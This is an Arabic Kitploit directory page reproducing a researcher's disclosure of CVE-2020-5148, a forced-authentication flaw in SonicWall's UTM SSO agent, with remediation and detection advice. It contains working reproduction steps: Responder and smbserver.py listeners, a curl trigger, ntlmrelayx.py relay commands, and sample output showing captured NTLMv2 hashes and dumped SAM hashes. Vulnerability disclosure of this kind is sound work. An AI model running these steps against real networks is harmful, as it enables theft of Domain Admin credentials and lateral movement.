Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-5148 — CVE-2020-5148 - مصادقة قسرية في وكيل SonicWall UTM SSO. يقوم الوكيل بفحص محطات العمل غير الموثوقة بصفة مسؤول المجال (Domain Admin)، لذا فإن طلب ويب صادر واحد ينتج عنه تجزئة NTLMv2 مميزة. النشرة الاستشارية SNWLID-2021-0003. | Kitploit
أدوات/GitHubGitHub/l0lsec/cve-2020-5148
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويبأمن الشبكاتاختبار الاختراقالمصادقةالفريق الأحمر
GitHubl0lsec/cve-2020-5148

CVE-2020-5148

CVE-2020-5148 - مصادقة قسرية في وكيل SonicWall UTM SSO. يقوم الوكيل بفحص محطات العمل غير الموثوقة بصفة مسؤول المجال (Domain Admin)، لذا فإن طلب ويب صادر واحد ينتج عنه تجزئة NTLMv2 مميزة. النشرة الاستشارية SNWLID-2021-0003.

منذ 27 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودعالموقع الإلكتروني

CVE-2020-5148

المصادقة القسرية في وكيل SonicWall UTM SSO

يحدد وكيل SonicWall SSO المستخدم خلف عنوان IP معين عن طريق فحص محطة العمل تلك باستخدام NetAPI (الافتراضي) أو WMI. وهو لا يتحقق من محطة العمل قبل بدء مصادقة NTLM، ويواصل الاستعلام عن العنوان نفسه طوال عمر الجلسة.

نظرًا لأن خدمة وكيل SSO تتطلب صلاحيات إدارية على كل محطة عمل وخادم تفحصه، فإنها تُنشر عمليًا بحساب Domain Admin. وبالتالي، يمكن لأي طرف غير مصادَق قادر على توجيه حركة مرور الويب عبر جهاز UTM أن يجعل حساب Domain Admin يصادق على مضيف من اختياره، ثم يلتقط تلك المصادقة أو يرحّلها.

نُشرت باسم CVE-2020-5148، مع نشرة أمنية من البائع SNWLID-2021-0003.

اكتشفها وأبلغ عنها Sedric Louissaint من Show Up Show Out Security.


الملخص

CVECVE-2020-5148
المنتجSonicWall UTM Appliance ووكيل SSO / Directory Services Connector
المتأثروكيل SSO 4.1.10.0؛ Directory Services Connector 4.1.17 والإصدارات الأقدم
أُصلح فييسجّل NVD الإصلاح في Directory Services Connector 4.1.19 (انظر الملاحظة أدناه)
مواطن الضعفCWE-287: مصادقة غير سليمة
CVSS 3.1 (NVD)8.2 عالية CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
CVSS (الباحث)8.6 AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
تاريخ النشر2021-03-05
اختُبر علىMicrosoft Windows Server 2012 R2 Standard
المصادقة المطلوبةلا شيء
نشرة البائع الأمنيةhttps://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0003

وصف NVD:

يستخدم التكوين الافتراضي لوكيل SonicWall SSO بروتوكول NetAPI لفحص عناوين IP المرتبطة في الشبكة، وتتيح طريقة فحص العملاء هذه لمهاجم محتمل التقاط تجزئة كلمة المرور

التفاصيل التقنية

التدفق المقصود، والخطوتان اللتان يغفلهما

  1. تصل حركة مرور المستخدم إلى جهاز SonicWALL UTM.
  2. يرسل الجهاز عنوان IP الخاص بالمستخدم إلى وكيل SSO باسم 'طلب اسم المستخدم'. وتُحتجز الحزم المحظورة.
  3. يرد وكيل SSO باسم المستخدم المسجّل للدخول على تلك المحطة.
  4. يحلّل LDAP أو قاعدة البيانات المحلية عضوية المجموعة.
  5. تُطبَّق السياسة وتُحرَّر حركة المرور المحتجزة.
  6. يواصل الجهاز الاستعلام عن وكيل SSO للتأكد من أن المستخدم نفسه ما زال مسجلاً للدخول.

تدفق SonicWALL SSO، مع تعليقات توضح الخطوتين غير الموثقتين

تشير التعليقات إلى ما يستبعده مخطط البائع:

  • الخطوة 2.5 يجب على وكيل SSO مصادقة محطة العمل قبل أن يتمكن من الاستعلام عنها. وهي مصافحة NTLM صادرة إلى عنوان يوفره من أنشأ حركة المرور، دون أي تحقق مسبق من ذلك العنوان.
  • الخطوة 5.5 يكرر الوكيل تلك المصادقة في كل استعلام طوال عمر الجلسة. وفترة الاستعلام قابلة للتكوين من الواجهة الرسومية.

سياق الصلاحيات

تتطلب خدمة وكيل SSO صلاحيات مسؤول على جميع محطات العمل والخوادم المرتبطة بها حتى تتمكن من تنفيذ الاستعلام من الأساس. وهذا يعني عمليًا في كل بيئات النشر أن حساب الخدمة هو Domain Admin.

ولذلك، فإن بيانات الاعتماد التي تُسلَّم إلى مضيف غير موثوق هي الحساب الأعلى صلاحية في الدليل.

خصائص ملف SSOAgentService.exe تعرض الإصدار 4.1.10.0

تحفيزها

لا يوجد أي كود استغلال. يكفي أي طلب ويب صادر من قطاع يتعامل معه الجهاز:

root@kitploit:~
curl sonicwall.com

أمر curl واحد يعبر حدود الشبكة

عنوان URL غير مهم ولا يحتاج الطلب إلى النجاح. يرصد الجهاز حركة مرور قادمة من عنوان IP غير معروف، ويطلب من وكيل SSO تحديد هوية المستخدم هناك، ثم يصادق الوكيل على ذلك العنوان.

التقاط بيانات الاعتماد

مع تشغيل Responder أو smbserver.py في وضع الاستماع، تصل مصادقة NTLMv2 من الوكيل من تلقاء نفسها، وتستمر في الوصول بسبب سلوك الاستعلام الدوري:

root@kitploit:~
[SMB] NTLMv2-SSP Client   : 192.168.x.x
[SMB] NTLMv2-SSP Username : <DOMAIN>\<privileged account>
[SMB] NTLMv2-SSP Hash     : ...

تجزئات NTLMv2 ملتقطة من وكيل SSO

ترحيلها

كسر كلمات المرور (Cracking) اختياري. حيثما لا يكون توقيع SMB مفروضًا، يمكن ترحيل المصادقة مباشرة إلى مضيف مختلف، يتعامل بعدها مع الاتصال على أنه الحساب المتميز الذي يبدو عليه:

root@kitploit:~
ntlmrelayx.py -t <target> -smb2support -of <output>
root@kitploit:~
[*] SMBD-Thread-4: Received connection from 192.168.x.x, attacking target smb://192.168.x.x
[*] Authenticating against smb://192.168.x.x as <DOMAIN>\<user> SUCCEED
[*] Starting service RemoteRegistry
[*] Target system bootKey: ...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Done dumping SAM hashes for host: 192.168.x.x

ntlmrelayx يرحّل المصادقة ويُفرغ تجزئات SAM

تُثار المصادقة بطلب ويب غير مصادَق وتُستهلَك على جهاز مختلف تمامًا، وهو ما يمثل التجاوز الكامل لقوائم التحكم في الوصول (ACL) الموصوف في النشرة الأمنية.

إعادة الإنتاج

في مختبر تملكه أو مخوَّل لك اختباره، مع جهاز UTM مهيأ لـ SSO ووكيل SSO يستخدم طريقة فحص العملاء الافتراضية NetAPI:

  1. شغّل مستمعًا (listener) على مضيف داخل قطاع يتعامل معه الجهاز:
    root@kitploit:~
    sudo responder -I <interface>
    # or
    sudo smbserver.py c . -smb2support
    
  2. من المضيف نفسه، ولّد أي حركة مرور ويب صادرة عبر الجهاز:
    root@kitploit:~
    curl sonicwall.com
    
  3. يولّد التكوين القابل للاستغلال مصادقة NTLMv2 واردة من حساب خدمة وكيل SSO خلال ثوانٍ. انتظر وستتكرر بسبب الاستعلام الدوري.
  4. يمكنك اختياريًا الترحيل بدلاً من الالتقاط، ضد مضيف معطّل فيه توقيع SMB:
    root@kitploit:~
    ntlmrelayx.py -t smb://<second-host> -smb2support -of relayed
    

التسلسل الكامل للأوامر موجود في poc/repro.sh.

محتويات المستودع

root@kitploit:~
poc/
  repro.sh       Listener, trigger and relay commands, commented, safe to read first
  notes.md       Why NetAPI triggers this, what WMI changes, detection guidance
media/
  01-sso-flow-annotated.png
  02-curl-crossing-network-boundary.png
  03-ntlmv2-hashes-captured.png
  04-ntlmrelayx-sam-dump.png
  05-sso-agent-version-4.1.10.0.png

أسماء المستخدمين والتجزئات والعناوين الداخلية في اللقطات إما محجوبة أو من المختبر الأصلي.

المعالجة

  1. بدّل فحص العملاء من NetAPI إلى WMI. هذا هو الحل البديل الموثق من البائع وأسرع تغيير ذي معنى.
  2. لا تشغّل وكيل SSO بحساب يمكنه تسجيل الدخول في كل مكان. لا تسمح لـ administrator بتسجيل الدخول عبر خدمة وكيل SSO أو وحدة تحكم المجال (DC) أو خادم Exchange أو الخادم الطرفي. وحيثما يجب أن يبقى الحساب متميزًا، استخدم كلمة مرور طويلة بما يكفي بحيث لا يكون كسرها دون اتصال بالشبكة أمرًا واقعيًا، عشرون حرفًا أو أكثر، ولا تُعَد استخدامها أبدًا.
  3. قم بترقية Directory Services Connector. يسجّل NVD الإصلاح في الإصدار 4.1.19. لاحظ أنه في اختبار الباحث، ما زال الإصدار 4.1.19 والأحدث يُظهران سلوك الفحص الأساسي ويُظهران تحذيرًا بدلاً من إزالته. والتحذير ليس ضابطًا أمنيًا، لذا تعامل مع التحويل إلى WMI وتحصين الحساب على أنهما التخفيف الحقيقي.
  4. فرض توقيع SMB عبر جميع الأصول. هذا لا يمنع التقاط بيانات الاعتماد، لكنه يزيل خيار الترحيل.
  5. فكّر في تفعيل الحماية الموسعة للمصادقة (Extended Protection for Authentication) على الخدمات التي تدعمها، وقيّد حركة SMB الصادرة عند محيط الشبكة.
  6. اكشفها. محاولات المصادقة الصادرة من حساب خدمة وكيل SSO إلى مضيفين ليسوا محطات عمل مُدارة هي حدث عالي الدلالة. وكذلك مصادقة ذلك الحساب على عنوان لم يظهر أبدًا في جرد الأصول.

الجدول الزمني

التاريخالحدث
2020اكتُشفت وأُبلغ بها SonicWall
2021-03-05نُشرت CVE-2020-5148 والنشرة الأمنية SNWLID-2021-0003

مقالات

  • الحساب الشخصي: https://sedriclouissaint.com/blog/sonicwall-utm-sso-forced-authentication-cve-2020-5148/
  • Show Up Show Out Security: https://susos.co/blog/authforce-sonicwall-utm-sso-forced-authentication-cve-2020-5148

إخلاء مسؤولية

نُشرت بعد إفصاح البائع، للاستخدام الدفاعي والتعليمي. لا يوجد كود استغلال هنا لأنه لا يُطلب أي كود، وهذه هي النقطة الأساسية في هذا الاكتشاف. لا تشغّل هذه الأوامر ضد شبكات لا تملكها أو ليس لديك إذن كتابي لاختبارها.

تنزيل الأداة